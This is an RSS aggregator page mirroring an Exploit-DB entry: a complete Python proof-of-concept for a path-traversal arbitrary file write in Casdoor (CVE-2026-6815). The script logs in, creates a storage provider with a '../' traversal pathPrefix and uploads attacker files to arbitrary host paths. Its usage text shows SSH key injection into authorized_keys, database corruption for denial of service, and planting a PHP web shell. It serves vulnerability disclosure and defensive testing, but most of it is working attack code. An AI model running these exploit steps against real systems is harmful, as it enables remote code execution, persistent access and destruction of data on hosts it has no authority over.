惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

TaoSecurity Blog
TaoSecurity Blog
L
LINUX DO - 最新话题
Help Net Security
Help Net Security
N
News | PayPal Newsroom
www.infosecurity-magazine.com
www.infosecurity-magazine.com
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
The Last Watchdog
The Last Watchdog
S
Security @ Cisco Blogs
W
WeLiveSecurity
C
CXSECURITY Database RSS Feed - CXSecurity.com
Webroot Blog
Webroot Blog
T
Troy Hunt's Blog
V
Vulnerabilities – Threatpost
Google Online Security Blog
Google Online Security Blog
N
News and Events Feed by Topic
T
Threat Research - Cisco Blogs
Security Archives - TechRepublic
Security Archives - TechRepublic
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
T
Tor Project blog
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
D
Darknet – Hacking Tools, Hacker News & Cyber Security
PCI Perspectives
PCI Perspectives
Google DeepMind News
Google DeepMind News
T
Tailwind CSS Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Apple Machine Learning Research
Apple Machine Learning Research
IT之家
IT之家
S
SegmentFault 最新的问题
J
Java Code Geeks
P
Privacy & Cybersecurity Law Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
博客园 - 【当耐特】
博客园_首页
H
Hacker News: Front Page
T
Threatpost
Jina AI
Jina AI
博客园 - Franky
月光博客
月光博客
L
LINUX DO - 热门话题
The Cloudflare Blog
H
Heimdal Security Blog
博客园 - 司徒正美
酷 壳 – CoolShell
酷 壳 – CoolShell
Cloudbric
Cloudbric
雷峰网
雷峰网
Hugging Face - Blog
Hugging Face - Blog
S
Secure Thoughts
T
Tenable Blog
I
Intezer
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
sixpain · 2026-05-27 · via Exploit-DB.com RSS Feed

Casdoor 3.54.1 - Arbitrary File Write via Path Traversal

Platform:

Go

Date:

2026-05-27



# Exploit Title: Casdoor 3.54.1 - Arbitrary File Write via Path Traversal 
# Date: 2026-05-11
# Exploit Author: sixpain
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor
# Version: < 3.54.1
# Tested on: Linux / Docker
# CVE : CVE-2026-6815

"""
Casdoor Arbitrary File Write / Path Traversal PoC (CVE-2026-6815)
================================================

DESCRIPTION:
This script exploits a Path Traversal vulnerability in the storage provider 
management component of Casdoor. By creating a 'Local File System' provider 
with a manipulated 'pathPrefix', an authenticated administrator can bypass 
the storage sandbox to write, overwrite, or delete arbitrary files on the 
underlying host filesystem.

IMPACT:
- Remote Code Execution (RCE) via SSH key injection or web shell upload.
- Persistent Denial of Service (DoS) by corrupting core application binaries 
  or database files (e.g., casdoor.db).

USAGE EXAMPLES:
1. SSH Key Injection for RCE:
   python3 poc.py --url http://target:8000 --usr admin --psw 123 --file id_rsa.pub --rpath /home/casdoor/.ssh/authorized_keys

2. Persistent DoS (Database Corruption):
   python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db

3. Reverse Shell (via secondary web server webroot):
   python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php

TROUBLESHOOTING & TECHNICAL NOTES:
- APP & ORG CONTEXT: By default, the script targets the 'app-built-in' application 
  and 'built-in' organization. If you have credentials for custom 
  namespaces, specify them using the --appname and --orgname flags.
- FILE OVERWRITE BEHAVIOR: Successful overwriting occurs only once per unique 
  remote path. Casdoor's resource management logic prevents direct subsequent 
  overwrites by appending increments (e.g., file-1.ext, file-2.ext) to the 
  resource name if the entry already exists in the application's internal 
  database. To re-exploit the same path, the specific resource entry must 
  usually be deleted via the UI/API or a different provider name must be used.
- PERMISSIONS: Exploitation success is dependent on the OS-level permissions 
  of the user account running the Casdoor service.
- VERBOSE MODE: Use -v or --verbose to inspect raw API requests and responses.

DISCLAIMER:
This tool is for educational and coordinated disclosure purposes only. 
Unauthorized testing against systems you do not own is illegal.
"""


import argparse
import requests
import json
import os

def log_request(response, verbose):
    """Prints request and response details if verbose mode is enabled."""
    if verbose:
        print("\n" + "="*50)
        print(f"DEBUG - REQUEST: {response.request.method} {response.request.url}")
        print(f"HEADERS: {json.dumps(dict(response.request.headers), indent=2)}")
        if response.request.body:
            # Handle potential bytes body for multipart
            body = response.request.body
            if isinstance(body, bytes):
                print(f"BODY: <binary data, length {len(body)}>")
            else:
                print(f"BODY: {body}")
        print("-" * 50)
        print(f"DEBUG - RESPONSE: {response.status_code}")
        print(f"HEADERS: {json.dumps(dict(response.headers), indent=2)}")
        try:
            print(f"JSON BODY: {json.dumps(response.json(), indent=2)}")
        except:
            print(f"RAW BODY: {response.text[:500]}...") 
        print("="*50 + "\n")

def run_poc():
    parser = argparse.ArgumentParser(description="Casdoor Path Traversal Exploitation PoC")
    parser.add_argument("--url", required=True, help="Target base URL (e.g., http://casdoor:8000)")
    parser.add_argument("--usr", default="admin", help="Login username")
    parser.add_argument("--psw", default="123", help="Login password")
    parser.add_argument("--file", required=True, help="Local file to upload")
    parser.add_argument("--rpath", required=True, help="Absolute remote path (e.g., /tmp/pwned.txt)")
    parser.add_argument("--appname", default='app-built-in', help="Target Casdoor Application Name")
    parser.add_argument("--orgname", default='built-in', help="Target Casdoor Organization Name")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
    
    args = parser.parse_args()
    
    # Sanitize and validate URL schema
    target_url = args.url.strip().rstrip('/')
    if not target_url.startswith(('http://', 'https://')):
        print("[!] No protocol specified. Defaulting to http://")
        target_url = f"http://{target_url}"
    
    session = requests.Session()

    # Setting common user agent
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
    })

    # --- STEP 1: INITIAL SESSION ---
    print(f"[*] Step 1: Retrieving initial session cookie...")
    try:
        r1 = session.get(f"{target_url}/login/built-in")
        log_request(r1, args.verbose)
        
        if "casdoor_session_id" not in session.cookies:
            print("[-] Error: Failed to retrieve casdoor_session_id.")
            return
        print(f"[+] Session ID obtained: {session.cookies.get('casdoor_session_id')}")

        # --- STEP 2: LOGIN / PRIVILEGE ESCALATION ---
        print(f"[*] Step 2: Logging in as {args.usr}...")
        login_payload = {
            "application": args.appname,
            "organization": args.orgname,
            "username": args.usr,
            "password": args.psw,
            "autoSignin": True,
            "signinMethod": "Password",
            "type": "login"
        }
        
        r2 = session.post(
            f"{target_url}/api/login", 
            data=json.dumps(login_payload),
            headers={"Content-Type": "text/plain;charset=UTF-8"}
        )
        log_request(r2, args.verbose)
        
        login_res = r2.json()
        if login_res.get("status") == "ok" and 'admin' in login_res.get("data").lower():
            print("[+] Login successful. Admin privileges confirmed.")
        else:
            print("[!] Warning: Not an admin or login failed. Attempting to proceed anyway...")

        # --- STEP 2.5: VERSION CHECK ---
        print(f"[*] Step 2.5: Checking Casdoor version...")
        try:
            r_version = session.get(f"{target_url}/api/get-version-info")
            log_request(r_version, args.verbose)
            if r_version.status_code == 200:
                version_data = r_version.json().get("data", {})
                if not version_data:
                     # Some versions might return data directly or in different format
                     version_data = r_version.json()
                
                version = version_data.get("version", "unknown")
                print(f"[+] Target Casdoor version: {version}")
                
                # Check if version is patched (>= 3.54.1)
                is_vulnerable = True
                if version != "unknown" and version != "dev":
                    try:
                        v_clean = version.lstrip('v').split('-')[0]
                        v_parts = [int(p) for p in v_clean.split('.')]
                        if v_parts >= [3, 54, 1]:
                            is_vulnerable = False
                    except:
                        pass # Parsing error, assume vulnerable or let user decide
                
                if not is_vulnerable:
                    print(f"[!] WARNING: Target version {version} is likely PATCHED (>= 3.54.1) and this PoC will not work.")
                    choice = input("[?] Do you want to continue anyway? (y/N): ").lower()
                    if choice != 'y':
                        print("[-] Aborting.")
                        return
            else:
                print("[!] Warning: Could not retrieve version info (Status: {}).".format(r_version.status_code))
        except Exception as e:
            print(f"[!] Error during version check: {e}")


        # --- STEP 3: CREATE MALICIOUS STORAGE PROVIDER ---
        print("[*] Step 3: Creating Path Traversal Provider...")
        provider_payload = {
            "owner": "admin",
            "name": "path_traversal",
            "createdTime": "2026-02-20T17:59:58+01:00",
            "displayName": "Path Traversal Provider",
            "category": "Storage",
            "type": "Local File System",
            "method": "Normal",
            "pathPrefix": "../../../../../../../../../"
        }
        
        r3 = session.post(
            f"{target_url}/api/add-provider", 
            data=json.dumps(provider_payload),
            headers={"Content-Type": "text/plain;charset=UTF-8"}
        )
        log_request(r3, args.verbose)
        
        prov_res = r3.json()
        msg = prov_res.get("msg", "")
        if prov_res.get("status") == "ok":
            print("[+] Malicious provider created successfully.")
        elif "UNIQUE constraint failed" in msg:
            print("[*] Provider 'path_traversal' already exists. Reusing it.")
        else:
            print(f"[-] Failed to create provider: {msg}")
            if "pathPrefix" in msg and "is not allowed" in msg:
                print(f"[!] Escape sequence is sanitized. Check Casdoor version < 3.54.1 (CVE-2026-6815 is likely fixed).")
            return

        # --- STEP 4: FILE UPLOAD (EXPLOITATION) ---
        print(f"[*] Step 4: Uploading {args.file} to {args.rpath}...")
        upload_params = {
            "owner": args.orgname,
            "user": args.usr,
            "application": args.appname,
            "tag": "custom",
            "parent": "ResourceListPage",
            "fullFilePath": args.rpath,
            "provider": "path_traversal"
        }
        
        if not os.path.exists(args.file):
            print(f"[-] Error: Local file {args.file} not found.")
            return

        with open(args.file, 'rb') as f:
            # Note: headers are handled automatically by requests for multipart/form-data
            files = {'file': (os.path.basename(args.file), f, 'application/octet-stream')}
            r4 = session.post(f"{target_url}/api/upload-resource", params=upload_params, files=files)
            log_request(r4, args.verbose)
            
            upload_res = r4.json()

        if upload_res.get("status") == "ok":
            print("\n" + "!"*25)
            print(" EXPLOIT SUCCESSFUL")
            print("!"*25 + "\n")

            print(f"Response Path")
            print(25*'-')
            print(f'\t-data : {upload_res.get('data')}')
            print(f'\t-data2: {upload_res.get('data2')}')
            print(f'\t-data3: {upload_res.get('data3')}')
            print(25*'-')

        else:
                print(f"[-] Upload failed: {upload_res.get('msg')}")

    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    run_poc()